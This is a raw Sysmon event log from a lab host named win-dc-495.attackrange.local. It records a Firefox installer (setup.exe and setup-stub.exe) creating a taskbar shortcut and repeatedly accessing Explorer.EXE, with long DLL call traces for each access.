11241100x800000000000000016585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk2021-01-18 13:59:54.333 10341000x800000000000000016584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
